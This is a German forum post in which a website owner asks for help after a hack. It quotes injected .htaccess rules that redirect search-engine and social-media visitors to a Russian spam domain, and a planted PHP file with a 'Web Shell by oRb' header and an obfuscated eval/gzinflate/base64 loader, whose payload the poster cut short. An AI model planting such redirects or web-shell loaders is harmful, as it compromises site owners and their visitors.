Ergänzung:
Ich hab da auch schon etwas entdeckt - in der .htaccess stand sowas:
RewriteCond %{HTTP\_REFERER} .\*google.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*ask.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*yahoo.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*baidu.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*youtube.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*wikipedia.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*qq.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*excite.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*msn.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*netscape.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*aol.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*hotbot.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*goto.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*mamma.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*alltheweb.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*lycos.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*search.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*metacrawler.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*bing.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*dogpile.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*facebook.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*twitter.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*blog.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*live.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*myspace.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*linkedin.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*altavista.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*infoseek.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*yandex.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*rambler.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*mail.\*$ [NC,OR]
RewriteCond %{HTTP\_REFERER} .\*ya.\*$ [NC]
RewriteRule .\* http://medicquil.ru [R,L]
ErrorDocument 401 http://medicquil.ru
ErrorDocument 403 http://medicquil.ru
ErrorDocument 404 http://medicquil.ru
ErrorDocument 500 http://medicquil.ru
Das hab ich dann rausgelöscht. Und ein paar Stunden später stand wieder sowas drinn…
Hat die Datei forloadsh.php vielleciht etwas damit zu tun?
?php
//example: http://domain.com/forload.php?test
set\_time\_limit(0); //ñíèìàåì ëèìèò âðåìåíè âûïîëíåíèÿ ñêðèïòà
if (isset($\_GET['test']))
{
echo "s9d8f78ds97f";
}
?GIF89af
?php # Web Shell by oRb
$auth\_pass = "";
$color = "#df5";
$default\_action = 'FilesMan';
$default\_use\_ajax = true;
$default\_charset = 'Windows-1251';
preg\_replace("/.\*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/[das ging noch ewig so weiter,hab ich mal entfernt]",".");?